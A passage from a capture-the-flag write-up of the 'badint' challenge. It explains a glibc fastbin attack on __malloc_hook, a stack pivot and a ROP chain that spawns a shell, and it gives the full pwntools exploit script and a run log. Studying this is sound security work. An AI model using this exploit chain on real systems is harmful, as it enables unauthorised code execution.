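MALLOC_HOOK_ADDR = 0x7fbd777d5740     # __malloc_hook in the earlier dump
FAKE_CHUNK = 0x7fbd777d572d           # misaligned chunk start
HEADER = 0x10                         # prev_size + size fields

user_data = FAKE_CHUNK + HEADER       # where the copied data begins
pad_bytes = MALLOC_HOOK_ADDR - user_data
pad_hex_chars = pad_bytes * 2         # two input characters per decoded byte
print(hex(user_data), pad_bytes, pad_hex_chars)   # 0x7fbd777d573d 3 6

total_chars = 0x60 * 2                # payload length in characters
print(hex(total_chars // 2))          # 0x60 bytes, served from the 0x70 bin
```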

0x7f43b2d55720 <__memalign_hook>:   0x00007f43b2a1ac90	0x0000000000000000
0x7f43b2d55730 <__realloc_hook>:    0x00007f43b2a1ac30	0x0000000000000000
0x7f43b2d55740 <__malloc_hook>:     0x00000000deadbeef	0x0000000000000000	<- hook overwritten

On the next allocation, malloc will execute __malloc_hook, jumping to the address we wrote there.

void *__libc_malloc (size_t bytes)
{
	mstate ar_ptr;
  	void *victim;

  	void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook);

  	if (__builtin_expect (hook != NULL, 0))
		return (*hook)(bytes, RETURN_ADDRESS (0));

  	arena_get (ar_ptr, bytes);

So, we’ve got code execution. I searched for a one_gadget, confident that I’d be seeing a shell very soon. And so I did… locally…

While execve("/bin/sh", 0, 0) worked on my machine, popping a shell, the remote service wasn’t really happy about it:

XXXXXXXXXXXXXXXXXX: applet not found

Wuss? Luckily, Zach (ebeip90) pointed out that the remote services are running busybox, which is why execve("/bin/sh", 0, 0) fails; we have to do an execve("/bin/sh", ["sh"], 0) instead.

So one_gadget was no longer an option, since I didn’t have the address of an array containing “sh”. After some more failed attempts to get the gadget working anyway, I finally switched to stack pivoting and preparing a ROP chain on the stack.

The ROP chain basically reads user input to a known address (0x604900). With that, we can set up the array for argv (a pointer to “sh”, a terminating NULL and the string “sh” itself) and then call execve("/bin/sh", 0x604900, 0).

A possible stack pivoting gadget can be found in libc:

0x000000000002c1e9: add rsp, 0x90; pop rbx; pop rbp; pop r12; ret;

This is effectively add rsp, 0xa8 (0x90 plus three 8-byte pops), which lands in our input buffer.
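The 0xa8 is just the immediate plus the three pops that follow it. As a tiny sketch (`stack_shift` is a made-up helper):

```python
def stack_shift(add_imm: int, pops: int, word: int = 8) -> int:
    """Bytes rsp advances before the final ret of an add-rsp/pop gadget."""
    return add_imm + pops * word

shift = stack_shift(0x90, 3)       # add rsp, 0x90; pop rbx; pop rbp; pop r12
print(hex(shift))                  # 0xa8
```

The closing ret then takes its return address from that position, which is where the first gadget of the chain has to sit.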

log.info("Allocate chunk to overwrite MALLOC_HOOK")

# Pivot stack to the rop chain
payload = "\x01"*(0x6)
payload += addr(ADDESP)		# add rsp, 0xa8
payload += "\x01"*(0x60*2-len(payload))

sendSeq(0, 0, payload, False)

log.info("Send ROP chain")

payload = p64(0)*6		# Padding
	
# read(0, 0x604900, 24)
payload += p64(POPRAX)
payload += p64(0x0)
payload += p64(POPRDI)
payload += p64(0x0)
payload += p64(POPRSI)
payload += p64(0x604900)
payload += p64(POPRDX)
payload += p64(24)
payload += p64(SYSCALL)

# execve("/bin/sh", ["sh"], 0)
payload += p64(POPRAX)
payload += p64(59)
payload += p64(POPRDI)
payload += p64(BINSH)
payload += p64(POPRSI)
payload += p64(0x604900)	# array will be stored here after read
payload += p64(POPRDX)
payload += p64(0x0)
payload += p64(SYSCALL)
	
# Padding payload, so correct fast bin chunk will be used
payload += "\x02"*(0x60*2-len(payload))

sendSeq(0, 0, payload, False, False)

log.info("Send SH array")		

payload = p64(0x604910)			# Pointer to SH
payload += p64(0x0)
payload += "sh\x00\x00\x00\x00\x00\x00"	# SH 

r.sendline(payload)

r.interactive()

Since our data is read by fgets(&s, 768, stdin), our input is stored on the stack first. When malloc then tries to allocate the chunk for our input, it calls __malloc_hook, which now points to the add rsp, 0xa8 gadget. This moves the stack pointer to the start of our ROP chain, thus executing it.

The ROP chain then waits for input to store at 0x604900, for which we send the data to construct the argv array.

Now we should be able to call execve in a way that hopefully works even on the remote service:
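The 24 bytes sent at this point form a two-entry pointer array followed by the string it points to. A sketch of that layout in Python 3 (`build_argv_blob` is a hypothetical helper; the address is the one used by the chain):

```python
import struct

ARGV_ADDR = 0x604900                     # address the ROP chain reads into

def build_argv_blob(base: int) -> bytes:
    """argv = [pointer to "sh", NULL], followed by the string itself."""
    string_addr = base + 16              # right behind the two pointers
    return struct.pack("<QQ", string_addr, 0) + b"sh".ljust(8, b"\x00")

blob = build_argv_blob(ARGV_ADDR)
print(len(blob))                                   # 24, matches read(0, 0x604900, 24)
print(hex(struct.unpack_from("<Q", blob, 0)[0]))   # 0x604910
print(blob[16:18])                                 # b'sh'
```

With this in memory, rsi = 0x604900 is a valid argv whose first element is "sh", which is what busybox needs to pick the right applet.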

$ python xpl.py 1
[+] Opening connection to badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me on port 21813: Done
[*] Leak LIBC base
[+] LIBC leak       : 0x7f2a6a94d7b8
[+] LIBC base       : 0x7f2a6a58f000
[+] MALLOC_HOOK     : 0x7f2a6a94d72d
[+] ADDESP          : 0x7f2a6a5bb1e7
[*] Prepare fastbin list
[*] Create fastbin chunks and free them to populate fastbin list
[*] Overwrite Fastbin FD and get pointer to MALLOC_HOOK into fastbin list
[*] Allocate chunk to overwrite MALLOC_HOOK
[*] Send ROP chain
[*] Send SH array
[*] Switching to interactive mode
$ ls
badint
flag
$ cat flag
The flag is: All ints are not the same... A239... Some can be bad ints!

Final exploit

#!/usr/bin/python
import sys
from pwn import *

HOST = "badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me"
PORT = 21813

def sendSeq(seq, offset, data, lsf, rec=True):
	r.sendlineafter(":", str(seq))
	r.sendlineafter("Offset:", str(offset))
	r.sendlineafter("Data:", data)
	
	if (rec):
		r.recvuntil(":")
		if lsf:
			r.sendline("Yes")
		else:
			r.sendline("No")

def addr(a):
	return p64(a).encode("hex")

def exploit():		
	log.info("Leak LIBC base")

	sendSeq(0, 8, ('B'*0x80).encode("hex"), True)	
	
	data = r.recvuntil("0000").split(":")[2].strip()
	
	LEAK = u64(data.decode("hex"))	
	LIBC = LEAK - 0x3be7b8

	# Calculate gadgets
	MALLOC_HOOK 	= LEAK - 0x8b	
	ADDESP  	= LIBC + 0x000000000002c1e7		# Add RSP, 0xa8
	POPRAX  	= LIBC + 0x000000000001b218
	POPRSI  	= LIBC + 0x0000000000024805
	POPRDI  	= LIBC + 0x0000000000022b1a
	POPRDX  	= LIBC + 0x0000000000001b8e
	BINSH   	= LIBC + 0x000000000017ccdb
	SYSCALL 	= LIBC + 0x00000000000c1e55
	RET     	= LIBC + 0x0000000000088c85

	log.success("LIBC leak       : %s" % hex(LEAK))
	log.success("LIBC base       : %s" % hex(LIBC))
	log.success("MALLOC_HOOK     : %s" % hex(MALLOC_HOOK))
	log.success("ADDESP          : %s" % hex(ADDESP))

	log.info("Prepare fastbin list")
	
	log.info("Create fastbin chunks and free them to populate fastbin list")
	
	sendSeq(0, 0, "A"*0x16*2, True)		
	sendSeq(0, 0, "B"*0x60*2, True)
		
	log.info("Overwrite Fastbin FD and get pointer to MALLOC_HOOK into fastbin list")
		
	sendSeq(0, 0x150, addr(MALLOC_HOOK), True)
	
	log.info("Allocate chunk to overwrite MALLOC_HOOK")
	
	# Pivot stack to the rop chain
	payload = "\x01"*(0x6)
	payload += addr(ADDESP)		
	payload += "\x01"*(0x60*2-len(payload))

	sendSeq(0, 0, payload, False)

	log.info("Send ROP chain")
	
	payload = p64(0)*6				# Padding
		
	# read(0, 0x604900, 24)
	payload += p64(POPRAX)
	payload += p64(0x0)
	payload += p64(POPRDI)
	payload += p64(0x0)
	payload += p64(POPRSI)
	payload += p64(0x604900)
	payload += p64(POPRDX)
	payload += p64(24)
	payload += p64(SYSCALL)

	# execve("/bin/sh", ["sh"], 0)
	payload += p64(POPRAX)
	payload += p64(59)
	payload += p64(POPRDI)
	payload += p64(BINSH)
	payload += p64(POPRSI)
	payload += p64(0x604900)
	payload += p64(POPRDX)
	payload += p64(0x0)
	payload += p64(SYSCALL)
		
	# Padding payload up, so correct fast bin chunk will be used
	payload += "\x02"*(0x60*2-len(payload))

	sendSeq(0, 0, payload, False, False)

	log.info("Send SH array")		

	payload = p64(0x604910)			# Pointer to SH
	payload += p64(0x0)
	payload += "sh\x00\x00\x00\x00\x00\x00"	# SH

	r.sendline(payload)

	r.interactive()

	return

if __name__ == "__main__":	
	if len(sys.argv) > 1:
		r = remote(HOST, PORT)
		exploit()
	else:
		r = process("./badint", env={"LD_PRELOAD" : "./libc.so"})

		print util.proc.pidof(r)
		pause()
		exploit()